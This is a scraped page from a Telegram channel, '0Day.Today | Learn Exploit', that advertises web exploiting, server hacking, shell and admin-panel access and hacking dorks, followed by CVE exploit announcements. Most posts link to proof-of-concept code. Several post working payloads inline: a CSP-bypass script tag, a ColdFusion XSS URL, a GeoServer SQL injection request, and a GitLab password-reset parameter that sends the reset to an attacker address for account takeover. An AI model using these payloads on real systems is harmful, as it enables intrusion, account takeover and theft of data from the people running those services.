0Day.Today | Learn Exploit | Zero World | Dark web |
16.1K subscribers
1.07K photos
61 videos
444 files
1K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
CVE-2023-25136 ( OpenSSH Pre-Auth Double Free CVE-2023-25136 POC )

Github

#CVE #POC
——————‌
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-27524 ( Apache Superset Auth Bypass )

Exploit

#CVE #Exploit #POC
——————‌
0Day.Today
@LearnExploit
@Tech_Army
You can bypass CSP on any website that allows http://microsoft.com in a script-src

PoC: <script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>

This works because of the WordPress CSP bypass our engineer (octagon) found last year :

octagon.net

#BugBounty #bypass #POC
——————‌
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-0386 - PoC Exploit Released for Linux Kernel Privilege Escalation

Link

Exploit

#POC #exploit #linux
——————‌
0Day.Today
@LearnExploit
@Tech_Army
ColdFusion Debug XSS

POC: {{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain)

#POC #CVE #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-38831

WinRAR 6.22 code execution
PoC

Github

#exploit #CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-50254 PoC Exploit for Deepin-reader RCE

POC

Read

#CVE #POC #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-25157

GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeNamosloe=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1


#CVE #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions

Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com

#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army